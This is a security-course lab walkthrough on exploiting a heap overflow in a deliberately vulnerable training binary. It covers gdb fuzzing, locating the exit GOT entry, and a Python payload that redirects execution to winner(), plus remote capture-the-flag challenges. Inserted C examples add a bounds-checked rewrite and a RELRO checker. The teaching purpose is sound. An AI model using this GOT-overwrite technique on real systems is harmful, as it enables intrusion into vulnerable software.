ED 206: Heap Overflow via Data Overwrite (10 pts + 35 pts extra)

What You Need

A Google Cloud Debian 9 Linux machine, with these tools installed:

sudo apt update
sudo apt install build-essential gcc-multilib gdb -y
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall
chmod 755 msfinstall
sudo ./msfinstall

Purpose

To practice exploiting a heap overflow vulnerability. Since the heap doesn't store anything that directly ends up in EIP, you must use the heap overflow to change a return pointer.

Downloading & Running the Vulnerable Program

In an SSH window, execute these commands:

wget -nv https://samsclass.info/127/proj/ED206.c
wget -nv https://samsclass.info/127/proj/ED206
chmod a+x ED206
./ED206 AA BB
The program downloads and runs, printing "and that's a wrap folks!", as shown below.

Viewing the Source Code

Execute this command:

cat ED206.c
As shown below, a structure named "internet" is defined, which contains an integer (4 bytes) and a pointer to a string (4 bytes).

There's a function named winner(). As you might expect, our goal is to execute that function.

The main() routine creates two objects of type "internet" on the heap with malloc().

Then it copies the two command-line arguments into the strings in those objects without checking the input length.
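The lab's source isn't reproduced on this page. The program below is an added example, not Sam Bowne's ED206.c: it reconstructs the shape described above (an "internet" struct holding a 4-byte int and a 4-byte pointer, two objects created with malloc()) and replaces the unchecked strcpy() with a bounded copy that refuses anything that doesn't fit. The 8-byte name buffer (NAME_LEN), the helper names and the priority field are assumptions. neighbour_intact() recreates the two-object layout, offers the first object an oversized first argument, and checks that the second object's name pointer is untouched, which is exactly the corruption the fuzzing step below relies on.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Assumed shape of the lab's "internet" object: a 4-byte int followed by a
 * pointer to a separately malloc'd string (4 bytes on the lab's 32-bit build). */
struct internet {
    int priority;
    char *name;
};

enum { NAME_LEN = 8 };   /* assumed size of each name buffer, including the '\0' */

/* Bounded replacement for the lab's unchecked strcpy().  The string is copied
 * only if it fits in the NAME_LEN-byte buffer together with its terminator.
 * Returns 1 on success, 0 when the input was rejected (buffer left untouched). */
int safe_set_name(struct internet *obj, const char *src) {
    size_t n = 0;
    while (n < NAME_LEN && src[n] != '\0')   /* never scan past NAME_LEN bytes */
        n++;
    if (n == NAME_LEN)                       /* no room left for the terminator */
        return 0;
    memcpy(obj->name, src, n + 1);           /* n characters plus '\0' */
    return 1;
}

/* Allocate one object and its name buffer, as the lab's main() does. */
struct internet *new_internet(int priority) {
    struct internet *obj = malloc(sizeof *obj);
    if (obj == NULL)
        return NULL;
    obj->name = malloc(NAME_LEN);
    if (obj->name == NULL) {
        free(obj);
        return NULL;
    }
    obj->priority = priority;
    obj->name[0] = '\0';
    return obj;
}

void free_internet(struct internet *obj) {
    if (obj != NULL) {
        free(obj->name);
        free(obj);
    }
}

/* Does a fresh object accept this string?  1 = copied, 0 = rejected, -1 = OOM. */
int accepts(const char *src) {
    struct internet *obj = new_internet(0);
    if (obj == NULL)
        return -1;
    int ok = safe_set_name(obj, src);
    free_internet(obj);
    return ok;
}

/* Recreate the lab's two-object heap layout, offer the first object an
 * oversized first argument, and report whether the second object's name
 * pointer is still what malloc() returned.  1 = rejected and intact. */
int neighbour_intact(const char *oversized) {
    struct internet *i1 = new_internet(1);
    struct internet *i2 = new_internet(2);
    if (i1 == NULL || i2 == NULL) {
        free_internet(i1);
        free_internet(i2);
        return -1;
    }
    char *before = i2->name;
    int accepted = safe_set_name(i1, oversized);
    int intact = (accepted == 0) && (i2->name == before);
    free_internet(i1);
    free_internet(i2);
    return intact;
}

/* Same command-line shape as the lab binary: ./hardened AA BB */
int main(int argc, char **argv) {
    if (argc < 3) {
        fprintf(stderr, "usage: %s first second\n", argv[0]);
        return 1;
    }
    struct internet *i1 = new_internet(1);
    struct internet *i2 = new_internet(2);
    if (i1 == NULL || i2 == NULL || !safe_set_name(i1, argv[1]) || !safe_set_name(i2, argv[2])) {
        fprintf(stderr, "argument too long (max %d characters) or out of memory\n", NAME_LEN - 1);
        free_internet(i1);
        free_internet(i2);
        return 1;
    }
    printf("%d:%s %d:%s\n", i1->priority, i1->name, i2->priority, i2->name);
    puts("and that's a wrap folks!");
    free_internet(i1);
    free_internet(i2);
    return 0;
}
```

Compile with gcc -m32 on the same Debian machine to keep the 4-byte pointer layout the lab describes; the 24-byte first argument that crashes ED206 is simply refused here, so the second object's pointer is never overwritten.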

Fuzzing

Try strings of various lengths, as shown below. You will find that 24 bytes in the first parameter are sufficient to cause a crash.

Debugging the Program

Execute these commands to run the program in the gdb debugger, send the attack to it, and examine the registers.

gdb -q ./ED206
run AAAABBBBCCCCDDDDEEEEFFFF GGGG
info registers
x/2i $eip
As shown below, the program crashes with:

This means we can write to any memory location we wish, putting the data in place of 'GGGG' and the address in place of 'FFFF'.

Choosing a Write Address

Let's find an address to overwrite.

Execute this command:


disassemble main
Press Enter to move down to the end of the code, as shown below (your addresses will be different). There are two calls to strcpy, then one to puts, and one to exit.

Execute these commands to leave the debugger.


q
y
Let's view the Dynamic Relocation entries with objdump:

objdump -R ./ED206
As shown below, when I did it, the address of "exit" was stored at 0804990c.

Your address may be different. Make a note of the correct address on your system.

If we can write to that address, we can take over the program's execution when it calls "exit@plt".

Note: the "puts" address won't work because it contains the byte 0x28, which is ASCII for "(" and breaks the bash command line.
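The overwrite in this lab succeeds because the GOT slot for exit is still writable while main() runs. A binary linked with full RELRO (-Wl,-z,relro,-z,now) has the loader resolve every GOT entry at startup and then remap the table read-only, so the same write would fault instead of redirecting exit@plt. The following C program is an added example, not part of the lab: it classifies an ELF32 binary's RELRO level from the same program headers and dynamic table that readelf -l and readelf -d print (a PT_GNU_RELRO segment gives partial RELRO; adding DT_BIND_NOW or the DF_BIND_NOW flag gives full RELRO). build_image() and classify_constructed() assemble a constructed minimal ELF32 image so the check can be exercised without a real binary; their names and the image layout are this example's own.

```c
#include <elf.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Classify RELRO for an ELF32 image held in memory.
 * Returns 2 = full RELRO (PT_GNU_RELRO segment and BIND_NOW), 1 = partial
 * (PT_GNU_RELRO only), 0 = none, -1 = not a well-formed ELF32 image. */
int relro_level(const unsigned char *img, size_t len) {
    Elf32_Ehdr eh;
    if (len < sizeof eh) return -1;
    memcpy(&eh, img, sizeof eh);                       /* copy out: no unaligned reads */
    if (memcmp(eh.e_ident, ELFMAG, SELFMAG) != 0 || eh.e_ident[EI_CLASS] != ELFCLASS32)
        return -1;
    if (eh.e_phentsize != sizeof(Elf32_Phdr)) return -1;
    int relro = 0, bindnow = 0;
    for (unsigned i = 0; i < eh.e_phnum; i++) {
        size_t off = eh.e_phoff + (size_t)i * sizeof(Elf32_Phdr);
        Elf32_Phdr ph;
        if (off + sizeof ph > len) return -1;
        memcpy(&ph, img + off, sizeof ph);
        if (ph.p_type == PT_GNU_RELRO)
            relro = 1;                                 /* loader mprotects this range read-only */
        if (ph.p_type == PT_DYNAMIC) {
            if (ph.p_offset > len || ph.p_filesz > len - ph.p_offset) return -1;
            for (size_t j = 0; j + sizeof(Elf32_Dyn) <= ph.p_filesz; j += sizeof(Elf32_Dyn)) {
                Elf32_Dyn dyn;
                memcpy(&dyn, img + ph.p_offset + j, sizeof dyn);
                if (dyn.d_tag == DT_NULL) break;
                if (dyn.d_tag == DT_BIND_NOW || (dyn.d_tag == DT_FLAGS && (dyn.d_un.d_val & DF_BIND_NOW)))
                    bindnow = 1;                       /* every GOT slot resolved before main() */
            }
        }
    }
    if (relro && bindnow) return 2;
    return relro ? 1 : 0;
}

/* Build a constructed, minimal ELF32 image (header, program headers, dynamic
 * table) so the classifier can be exercised without a real binary. */
size_t build_image(unsigned char *buf, size_t cap, int with_relro, int with_bindnow) {
    size_t phnum = with_relro ? 2 : 1;
    size_t dyn_off = sizeof(Elf32_Ehdr) + phnum * sizeof(Elf32_Phdr);
    size_t total = dyn_off + 2 * sizeof(Elf32_Dyn);    /* DT_FLAGS entry + DT_NULL */
    if (cap < total) return 0;
    memset(buf, 0, total);
    Elf32_Ehdr eh = { .e_type = ET_EXEC, .e_machine = EM_386, .e_phoff = sizeof(Elf32_Ehdr),
                      .e_phentsize = sizeof(Elf32_Phdr), .e_phnum = (Elf32_Half)phnum };
    memcpy(eh.e_ident, ELFMAG, SELFMAG);
    eh.e_ident[EI_CLASS] = ELFCLASS32;
    eh.e_ident[EI_DATA] = ELFDATA2LSB;
    Elf32_Phdr dynph = { .p_type = PT_DYNAMIC, .p_offset = (Elf32_Off)dyn_off,
                         .p_filesz = (Elf32_Word)(2 * sizeof(Elf32_Dyn)) };
    Elf32_Phdr relroph = { .p_type = PT_GNU_RELRO };
    Elf32_Dyn flags = { .d_tag = DT_FLAGS, .d_un.d_val = with_bindnow ? DF_BIND_NOW : 0 };
    memcpy(buf, &eh, sizeof eh);
    memcpy(buf + sizeof eh, &dynph, sizeof dynph);
    if (with_relro) memcpy(buf + sizeof eh + sizeof dynph, &relroph, sizeof relroph);
    memcpy(buf + dyn_off, &flags, sizeof flags);       /* next entry stays zero = DT_NULL */
    return total;
}

/* Classify one constructed image; used to exercise relro_level() offline. */
int classify_constructed(int with_relro, int with_bindnow) {
    unsigned char buf[256];
    size_t n = build_image(buf, sizeof buf, with_relro, with_bindnow);
    return n ? relro_level(buf, n) : -1;
}

/* Usage: ./relro-check ./ED206 */
int main(int argc, char **argv) {
    static const char *names[] = { "none", "partial", "full" };
    if (argc != 2) { fprintf(stderr, "usage: %s <elf32-binary>\n", argv[0]); return 1; }
    FILE *f = fopen(argv[1], "rb");
    if (f == NULL) { perror(argv[1]); return 1; }
    fseek(f, 0, SEEK_END);
    long sz = ftell(f);
    rewind(f);
    unsigned char *img = sz > 0 ? malloc((size_t)sz) : NULL;
    if (img == NULL || fread(img, 1, (size_t)sz, f) != (size_t)sz) {
        fprintf(stderr, "read failed\n");
        fclose(f);
        free(img);
        return 1;
    }
    fclose(f);
    int lvl = relro_level(img, (size_t)sz);
    if (lvl < 0) fprintf(stderr, "not a well-formed ELF32 image\n");
    else printf("RELRO: %s\n", names[lvl]);
    free(img);
    return lvl < 0;
}
```

Running it against ./ED206 tells you whether the exit slot found with objdump -R can be written at all; readelf -l ./ED206 (look for GNU_RELRO) and readelf -d ./ED206 (look for BIND_NOW) show the same facts by hand.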

Disassembling winner()

Execute these commands:

gdb -q ./ED206
disassemble winner
q
As shown below, when I did it, this function started at address 0x080484ab.

Your address may be different. Make a note of the correct address on your system.

Writing a Python Exploit File

Execute this command:

nano h11
In nano, enter this code to overwrite the return pointer with the start of winner().

You will have to adjust the addresses to be correct for your system.


#!/usr/bin/python
# Python 2: the print statement emits the raw bytes unchanged.

# 0804990c exit    (GOT entry for exit, from objdump -R)
# 080484ab winner  (start of winner(), from disassemble winner)

# First argument: 20 bytes of padding, then the exit GOT address (little-endian)
# in place of 'FFFF'.  Second argument: the address of winner(), which strcpy
# writes into that GOT slot.
print 'AAAABBBBCCCCDDDDEEEE' + '\x0c\x99\x04\x08' + ' ' + '\xab\x84\x04\x08'

Save the file with Ctrl+X, Y, Enter.

Running the Exploit

Execute these commands:

chmod a+x h11
./ED206 $(./h11)

ED 206.1 Heap Exploit (10 pts)

The flag appears, covered by a green box in the image below.


ED 206.2: Exploiting a 32-Bit Server (15 pts extra)

This form sends a string to a remote server and runs it through a 32-bit server process.

Enter the strings directly, like AAA.

The "debug" button runs the program inside gdb.

Redirect execution to the winner() function to see the flag.

Hint: %5c is a backslash, so to send it you must place %5c%5c into a URL.

ED 206.3: Exploiting a 64-Bit Server (20 pts extra)

This form sends a string to a remote server and runs it through a 64-bit server process.

Enter the strings directly, like AAA.

The "debug" button runs the program inside gdb.

Redirect execution to the winner() function to see the flag.

Hint: %60 is a backtick, so to send it you must place %5c%60 into a URL.

Hint: You don't need to send any null bytes.



Posted 9-17-15 by Sam Bowne
Revised 2-14-17
-no-pie switch added 2-20-18
Minor formatting edits 2-23-18
Tested on Kali 2018.3x86 and it worked OK 9-22-18
Ported to Google Cloud 8-1-19
ED206.2 and ED206.3 added 9-20-19
Hints added for ED 206.3 2-29-2020